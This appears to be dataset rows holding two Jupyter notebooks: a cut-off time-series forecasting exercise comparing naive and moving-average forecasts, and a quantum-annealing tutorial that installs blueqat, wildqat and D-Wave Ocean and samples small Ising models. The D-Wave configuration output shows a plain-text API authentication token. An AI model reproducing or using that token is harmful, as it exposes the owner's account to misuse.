2\n\n# Create the series\nseries = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)\n# Update with noise\nseries += noise(time, noise_level, seed=42)\n\nplt.figure(figsize=(10, 6))\nplot_series(time, series)\nplt.show()\n\n# EXPECTED OUTPUT\n# Chart as in the screencast. First should have 5 distinctive 'peaks'",
"_____no_output_____"
]
],
[
[
"Now that we have the time series, let's split it so we can start forecasting",
"_____no_output_____"
]
],
[
[
"split_time = 1100 # YOUR CODE HERE\ntime_train = time[:split_time]\nx_train = series[:split_time]\ntime_valid = time[split_time:]\nx_valid = series[split_time:]\nplt.figure(figsize=(10, 6))\nplot_series(time_train, x_train)\nplt.show()\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplt.show()\n\n# EXPECTED OUTPUT\n# Chart WITH 4 PEAKS between 50 and 65 and 3 troughs between -12 and 0\n# Chart with 2 Peaks, first at slightly above 60, last at a little more than that, should also have a single trough at about 0",
"_____no_output_____"
]
],
[
[
"# Naive Forecast",
"_____no_output_____"
]
],
[
[
"naive_forecast = series[split_time -1 : -1]#YOUR CODE HERE",
"_____no_output_____"
],
[
"plt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplot_series(time_valid, naive_forecast)\n\n# Expected output: Chart similar to above, but with forecast overlay",
"_____no_output_____"
]
],
[
[
"Let's zoom in on the start of the validation period:",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid, start = 0, end = 150)# YOUR CODE HERE\nplot_series(time_valid, naive_forecast, start = 1, end = 151)# YOUR CODE HERE\n\n# EXPECTED - Chart with X-Axis from 1100-1250 and Y Axes with series value and projections. Projections should be time stepped 1 unit 'after' series",
"_____no_output_____"
]
],
[
[
"Now let's compute the mean squared error and the mean absolute error between the forecasts and the predictions in the validation period:",
"_____no_output_____"
]
],
[
[
"print(keras.metrics.mean_squared_error(x_valid, naive_forecast).numpy()) # YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, naive_forecast).numpy())# YOUR CODE HERE\n# Expected Output\n# 19.578304\n# 2.6011968",
"19.578304\n2.6011968\n"
]
],
[
[
"That's our baseline, now let's try a moving average:",
"_____no_output_____"
]
],
[
[
"def moving_average_forecast(series, window_size):\n \"\"\"Forecasts the mean of the last few values.\n If window_size=1, then this is equivalent to naive forecast\"\"\"\n forecast = []\n for time in range(len(series) - window_size):\n forecast.append(series[time:time + window_size].mean())\n return np.array(forecast)\n # YOUR CODE HERE",
"_____no_output_____"
],
[
"moving_avg = moving_average_forecast(series, 30)[split_time - 30:]# YOUR CODE HERE \n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplot_series(time_valid, moving_avg)\n \n# EXPECTED OUTPUT\n# CHart with time series from 1100->1450+ on X\n# Time series plotted\n# Moving average plotted over it",
"_____no_output_____"
],
[
"print(keras.metrics.mean_squared_error(x_valid, moving_avg).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, moving_avg).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 65.786224\n# 4.3040023",
"65.786224\n4.3040023\n"
],
[
"diff_series = (series[365:] - series[:-365])# YOUR CODE HERE\ndiff_time = time[365:] # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(diff_time, diff_series)\nplt.show()\n \n# EXPECETED OUTPUT: CHart with diffs",
"_____no_output_____"
]
],
[
[
"Great, the trend and seasonality seem to be gone, so now we can use the moving average:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg = moving_average_forecast(diff_series, 50)[split_time - 365 - 50:] # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, diff_series[split_time - 365:]) # YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg)# YOUR CODE HERE\nplt.show()\n \n# Expected output. Diff chart from 1100->1450 +\n# Overlaid with moving average",
"_____no_output_____"
]
],
[
[
"Now let's bring back the trend and seasonality by adding the past values from t – 365:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg_plus_past = series[split_time - 365:-365] + diff_moving_avg # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)# YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg_plus_past)# YOUR CODE HERE\nplt.show()\n# Expected output: Chart from 1100->1450+ on X. Same chart as earlier for time series, but projection overlaid looks close in value to it",
"_____no_output_____"
],
[
"\nprint(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 8.498155\n# 2.327179",
"8.498155\n2.327179\n"
]
],
[
[
"Better than naive forecast, good. However the forecasts look a bit too random, because we're just adding past values, which were noisy. Let's use a moving averaging on past values to remove some of the noise:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg_plus_smooth_past = moving_average_forecast(series[split_time - 370:-360], 10) + diff_moving_avg # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)# YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg_plus_smooth_past)# YOUR CODE HERE\nplt.show()\n \n# EXPECTED OUTPUT:\n# Similar chart to above, but the overlaid projections are much smoother",
"_____no_output_____"
],
[
"print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 12.527958\n# 2.2034433",
"12.527958\n2.2034433\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2d4e100ff0711f5e39d569d0d7668052f8bbc1 | 28,297 | ipynb | Jupyter Notebook | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | 1 | 2019-07-29T11:35:16.000Z | 2019-07-29T11:35:16.000Z | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | null | null | null | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | null | null | null | 46.541118 | 390 | 0.534862 | [
[
[
"<a href=\"https://colab.research.google.com/github/matchbou/openql-notes/blob/master/connpass20190729hands-on-work004.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install imgaug==0.2.5",
"Collecting imgaug==0.2.5\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/d2/60/a06a48d85a7e9062f5870347a3e3e953da30b37928d43b380c949bca458a/imgaug-0.2.5.tar.gz (562kB)\n\u001b[K |████████████████████████████████| 563kB 5.0MB/s \n\u001b[?25hRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.3.0)\nRequirement already satisfied: scikit-image>=0.11.0 in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (0.15.0)\nRequirement already satisfied: numpy>=1.7.0 in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.16.4)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.12.0)\nRequirement already satisfied: matplotlib!=3.0.0,>=2.0.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (3.0.3)\nRequirement already satisfied: networkx>=2.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (2.3)\nRequirement already satisfied: imageio>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (2.4.1)\nRequirement already satisfied: pillow>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (4.3.0)\nRequirement already satisfied: PyWavelets>=0.4.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (1.0.3)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (2.4.0)\nRequirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (2.5.3)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (0.10.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (1.1.0)\nRequirement already satisfied: decorator>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from networkx>=2.0->scikit-image>=0.11.0->imgaug==0.2.5) (4.4.0)\nRequirement already satisfied: olefile in /usr/local/lib/python3.6/dist-packages (from pillow>=4.3.0->scikit-image>=0.11.0->imgaug==0.2.5) (0.46)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from kiwisolver>=1.0.1->matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (41.0.1)\nBuilding wheels for collected packages: imgaug\n Building wheel for imgaug (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/31/48/c8/ca3345e8582a078de94243996e148377ef66fdb845557bae0b\nSuccessfully built imgaug\nInstalling collected packages: imgaug\n Found existing installation: imgaug 0.2.9\n Uninstalling imgaug-0.2.9:\n Successfully uninstalled imgaug-0.2.9\nSuccessfully installed imgaug-0.2.5\n"
],
[
"!pip install blueqat",
"Collecting blueqat\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/55/94/0e80926933ec8d69a5c98454b59db4c772a7d7d1699f574a55aa53271941/blueqat-0.3.8-py3-none-any.whl (46kB)\n\r\u001b[K |███████ | 10kB 12.5MB/s eta 0:00:01\r\u001b[K |██████████████▏ | 20kB 3.4MB/s eta 0:00:01\r\u001b[K |█████████████████████▏ | 30kB 4.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████▎ | 40kB 3.2MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 51kB 3.5MB/s \n\u001b[?25hCollecting scipy~=1.1.0 (from blueqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a8/0b/f163da98d3a01b3e0ef1cab8dd2123c34aee2bafbb1c5bffa354cc8a1730/scipy-1.1.0-cp36-cp36m-manylinux1_x86_64.whl (31.2MB)\n\u001b[K |████████████████████████████████| 31.2MB 1.3MB/s \n\u001b[?25hRequirement already satisfied: numpy~=1.12 in /usr/local/lib/python3.6/dist-packages (from blueqat) (1.16.4)\nInstalling collected packages: scipy, blueqat\n Found existing installation: scipy 1.3.0\n Uninstalling scipy-1.3.0:\n Successfully uninstalled scipy-1.3.0\nSuccessfully installed blueqat-0.3.8 scipy-1.1.0\n"
],
[
"!pip install wildqat",
"Collecting wildqat\n Downloading https://files.pythonhosted.org/packages/18/20/babcd0cabd564903f7dc5430a022bd5cf6cc9f440bdbb268318b9f261908/wildqat-1.1.9.tar.gz\nCollecting numpy==1.15.1 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/fe/94/7049fed8373c52839c8cde619acaf2c9b83082b935e5aa8c0fa27a4a8bcc/numpy-1.15.1-cp36-cp36m-manylinux1_x86_64.whl (13.9MB)\n\u001b[K |████████████████████████████████| 13.9MB 5.7MB/s \n\u001b[?25hCollecting matplotlib==3.0.0 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/89/dd823436a5f8d5ca9304b51b554863bfd366ca84708d5812f5ee87c923bc/matplotlib-3.0.0-cp36-cp36m-manylinux1_x86_64.whl (12.8MB)\n\u001b[K |████████████████████████████████| 12.8MB 16.9MB/s \n\u001b[?25hCollecting networkx==2.2 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/f3/f4/7e20ef40b118478191cec0b58c3192f822cace858c19505c7670961b76b2/networkx-2.2.zip (1.7MB)\n\u001b[K |████████████████████████████████| 1.7MB 37.6MB/s \n\u001b[?25hRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (0.10.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (2.4.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (1.1.0)\nRequirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (2.5.3)\nRequirement already satisfied: decorator>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from networkx==2.2->wildqat) (4.4.0)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from cycler>=0.10->matplotlib==3.0.0->wildqat) (1.12.0)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from kiwisolver>=1.0.1->matplotlib==3.0.0->wildqat) (41.0.1)\nBuilding wheels for collected packages: wildqat, networkx\n Building wheel for wildqat (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/bc/b5/17/e68df34616a7719b1aa093d9aacdf006fe5a1640811e0ae942\n Building wheel for networkx (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/68/f8/29/b53346a112a07d30a5a84d53f19aeadaa1a474897c0423af91\nSuccessfully built wildqat networkx\n\u001b[31mERROR: yellowbrick 0.9.1 has requirement matplotlib!=3.0.0,>=1.5.1, but you'll have matplotlib 3.0.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: scikit-image 0.15.0 has requirement matplotlib!=3.0.0,>=2.0.0, but you'll have matplotlib 3.0.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: datascience 0.10.6 has requirement folium==0.2.1, but you'll have folium 0.8.3 which is incompatible.\u001b[0m\nInstalling collected packages: numpy, matplotlib, networkx, wildqat\n Found existing installation: numpy 1.16.4\n Uninstalling numpy-1.16.4:\n Successfully uninstalled numpy-1.16.4\n Found existing installation: matplotlib 3.0.3\n Uninstalling matplotlib-3.0.3:\n Successfully uninstalled matplotlib-3.0.3\n Found existing installation: networkx 2.3\n Uninstalling networkx-2.3:\n Successfully uninstalled networkx-2.3\nSuccessfully installed matplotlib-3.0.0 networkx-2.2 numpy-1.15.1 wildqat-1.1.9\n"
],
[
"import blueqat\nimport wildqat",
"_____no_output_____"
],
[
"!pip install dwave-ocean-sdk && dwave config create",
"Requirement already satisfied: dwave-ocean-sdk in /usr/local/lib/python3.6/dist-packages (1.4.0)\nRequirement already satisfied: dwave-hybrid<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.3.1)\nRequirement already satisfied: pyqubo>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.4.0)\nRequirement already satisfied: dwave-networkx<0.9.0,>=0.8.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.8.0)\nRequirement already satisfied: dwave-tabu<0.3.0,>=0.2.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.2.0)\nRequirement already satisfied: dwave-neal<0.6.0,>=0.5.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.5.1)\nRequirement already satisfied: dwave-system<0.8.0,>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.7.5)\nRequirement already satisfied: dimod<0.9.0,>=0.8.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.8.14)\nRequirement already satisfied: numpy<1.16.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (1.15.1)\nRequirement already satisfied: dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\" in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.0.11)\nRequirement already satisfied: dwave-qbsolv<0.3.0,>=0.2.7 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.2.10)\nRequirement already satisfied: six>=1.10 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (1.12.0)\nRequirement already satisfied: minorminer>=0.1.7 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (0.1.8)\nRequirement already satisfied: networkx in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (2.2)\nRequirement already satisfied: click>5 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (7.0)\nRequirement already satisfied: plucky>=0.4.3 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (0.4.3)\nRequirement already satisfied: decorator<5.0.0,>=4.1.0 in /usr/local/lib/python3.6/dist-packages (from dwave-networkx<0.9.0,>=0.8.0->dwave-ocean-sdk) (4.4.0)\nRequirement already satisfied: dwave-cloud-client<0.6.0,>=0.5.0 in /usr/local/lib/python3.6/dist-packages (from dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (0.5.4)\nRequirement already satisfied: homebase<2.0.0,>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.0.1)\nRequirement already satisfied: jsonschema<3.0.0,>=2.6.0 in /usr/local/lib/python3.6/dist-packages (from dimod<0.9.0,>=0.8.0->dwave-ocean-sdk) (2.6.0)\nRequirement already satisfied: penaltymodel-cache<0.5.0,>=0.4.0 in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.4.0)\nRequirement already satisfied: penaltymodel<0.17.0,>=0.16.0 in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.16.2)\nRequirement already satisfied: penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\" in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.2.1)\nRequirement already satisfied: requests[socks]>=2.18 in /usr/local/lib/python3.6/dist-packages (from dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.21.0)\nRequirement already satisfied: python-dateutil>=2.7 in /usr/local/lib/python3.6/dist-packages (from dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.8.0)\nRequirement already satisfied: ortools<7.0.0,>=6.6.4659 in /usr/local/lib/python3.6/dist-packages (from penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (6.10.6025)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (3.0.4)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.8)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2019.6.16)\nRequirement already satisfied: PySocks!=1.5.7,>=1.5.6; extra == \"socks\" in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.7.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from ortools<7.0.0,>=6.6.4659->penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (3.7.1)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from protobuf>=3.6.1->ortools<7.0.0,>=6.6.4659->penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (41.0.1)\nFound existing configuration file: /root/.config/dwave/dwave.conf\nConfiguration file path [/root/.config/dwave/dwave.conf]: \nProfile (create new or choose from: prod): prod\nAPI endpoint URL [https://cloud.dwavesys.com/leap/]: https://cloud.dwavesys.com/sapi\nAuthentication token [DEV-ddca80c30487ba608a2743b2105d60f8d6952fd0]: DEV-ddca80c30487ba608a2743b2105d60f8d6952fd0\nDefault client class (qpu or sw) [gpu]: qpu\nDefault solver [skip]: \nConfiguration saved.\n"
],
[
"from dwave.system.samplers import DWaveSampler",
"_____no_output_____"
],
[
"from dwave.system.composites import EmbeddingComposite",
"_____no_output_____"
],
[
"sampler = EmbeddingComposite(DWaveSampler())\n",
"_____no_output_____"
],
[
"response = sampler.sample_ising({0:0},{},num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 energy num_oc. chain_.\n0 -1 0.0 4 0.0\n1 +1 0.0 6 0.0\n['SPIN', 2 rows, 10 samples, 1 variables]\n"
],
[
"response = sampler.sample_ising({},{(0,1):1},num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 energy num_oc. chain_.\n0 -1 +1 -1.0 5 0.0\n1 +1 -1 -1.0 5 0.0\n['SPIN', 2 rows, 10 samples, 2 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):-1}, num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 energy num_oc. chain_.\n0 -1 -1 -1.0 7 0.0\n1 +1 +1 -1.0 3 0.0\n['SPIN', 2 rows, 10 samples, 2 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 -1 +1 -1 +1 -1 -4.0 2 0.0\n1 +1 -1 +1 -1 -1 -4.0 2 0.0\n2 +1 -1 +1 -1 +1 -4.0 2 0.0\n3 -1 +1 -1 +1 +1 -4.0 3 0.0\n4 +1 -1 +1 -1 +1 -4.0 1 0.2\n['SPIN', 5 rows, 10 samples, 5 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)\nprint(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 -1 +1 -1 +1 -1 -4.0 2 0.0\n1 +1 -1 +1 -1 -1 -4.0 3 0.0\n2 +1 -1 +1 -1 +1 -4.0 1 0.0\n4 +1 -1 +1 -1 +1 -4.0 3 0.2\n3 -1 +1 +1 +1 -1 -2.0 1 0.2\n['SPIN', 5 rows, 10 samples, 5 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)\nprint(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 +1 -1 +1 -1 +1 -4.0 1 0.2\n1 +1 -1 +1 -1 -1 -4.0 1 0.0\n2 +1 -1 +1 -1 +1 -4.0 1 0.0\n3 -1 +1 -1 +1 -1 -4.0 4 0.0\n5 -1 +1 -1 +1 +1 -4.0 2 0.0\n4 -1 +1 +1 +1 -1 -2.0 1 0.2\n['SPIN', 6 rows, 10 samples, 5 variables]\n"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.